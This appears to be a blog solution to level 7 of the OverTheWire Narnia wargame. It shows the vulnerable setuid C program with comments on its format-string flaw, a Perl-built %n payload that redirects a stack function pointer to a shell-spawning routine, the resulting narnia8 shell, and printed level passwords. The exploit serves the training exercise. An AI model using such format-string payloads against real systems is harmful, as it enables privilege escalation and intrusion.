# Narnia wargame: Level 7


# ssh narnia7@narnia.labs.overthewire.org
narnia7@narnia.labs.overthewire.org's password:61686b69617a69706875

narnia7@melissa$ file /narnia/narnia7
/narnia/narnia7: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
narnia7@melissa$ cat /narnia/narnia7.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

/* Forward declarations: both functions are defined after main(), but vuln()
 * takes their addresses before those definitions appear. The empty
 * parentheses leave the parameter list unspecified (pre-C23 C). */
int goodfunction();
int hackedfunction();

/*
 * vuln - copy a caller-supplied string into a stack buffer, then call through
 * a local function pointer.
 *
 * format: passed straight from argv[1] by main(), so it is untrusted input.
 * Returns whatever the function behind ptrf returns.
 *
 * Security review (CWE-134, uncontrolled format string): the untrusted string
 * is used as the *format* argument of snprintf(), not as data. Any conversion
 * specifier in it is interpreted, and %n makes snprintf() write to memory.
 * The size argument bounds only the bytes stored in buffer, not what the
 * directives themselves do. ptrf is a stack local that is called right after
 * the formatting, so memory corruption here turns into control-flow hijack.
 *
 * Fix: treat the input as data, snprintf(buffer, sizeof buffer, "%s", format).
 * Build-time defences: -Wformat -Wformat-security flags the non-literal
 * format, and -D_FORTIFY_SOURCE=2 makes glibc reject %n in a writable format
 * string.
 */
int vuln(const char *format){
        char buffer[128];
        int (*ptrf)();

        memset(buffer, 0, sizeof(buffer));
        /* Information disclosure: the code addresses of both functions are
         * printed to the user. */
        printf("goodfunction() = %p\n", goodfunction);
        printf("hackedfunction() = %p\n\n", hackedfunction);

        ptrf = goodfunction;
        /* Also discloses the stack address of the function pointer itself. */
        printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);

        printf("I guess you want to come to the hackedfunction...\n");
        sleep(2);
        /* Re-assignment of the same value as above; ptrf is goodfunction when
         * snprintf() runs. */
        ptrf = goodfunction;

        /* Vulnerable call: attacker-controlled string used as the format. */
        snprintf(buffer, sizeof buffer, format);

        /* Indirect call through the stack-resident pointer; nothing verifies
         * that it still holds goodfunction. */
        return ptrf();
}

int main(int argc, char **argv){
        /* The first command-line argument is handed to vuln() unchanged, so
         * everything vuln() does with it operates on untrusted input. The
         * process exit status is vuln()'s return value. */
        if (argc > 1){
                exit(vuln(argv[1]));
        }

        /* No argument supplied: print the usage line and fail. */
        fprintf(stderr, "Usage: %s \n", argv[0]);
        exit(-1);
}

/* Intended call target: vuln() assigns this function to ptrf. It prints a
 * message, flushes stdout and returns 0. */
int goodfunction(){
        fputs("Welcome to the goodfunction, but i said the Hackedfunction..\n", stdout);
        fflush(stdout);

        return 0;
}

/* Never assigned to ptrf anywhere in this listing; it is reached only if the
 * pointer in vuln() is corrupted. It prints a message and spawns /bin/sh via
 * system(). The binary is reported as setuid by file(1), and the transcript
 * shows the resulting shell running as narnia8. Real setuid programs should
 * not contain a shell-spawning routine like this, and should avoid system(). */
int hackedfunction(){
        fputs("Way to go!!!!", stdout);
        /* Flush first so the message is visible before the shell starts. */
        fflush(stdout);
        system("/bin/sh");

        return 0;
}
narnia7@melissa$ /narnia/narnia7 `perl -e 'print "\x9c\xd6\xff\xff" . "%x%x%x%x%.134514310d%n"'`
goodfunction() = 0x804867b
hackedfunction() = 0x80486a1

before : ptrf() = 0x804867b (0xffffd69c)
I guess you want to come to the hackedfunction...
Way to go!!!!$ /usr/bin/whoami
narnia8
$ /bin/cat /etc/narnia_pass/narnia8
6d6f6874687570686f67

1 comment:

Anonymous said...

It would be awesome if you could also explain a little how you arrived at the solution. For example, how did you work out that 4 %x's and .134514310 were needed?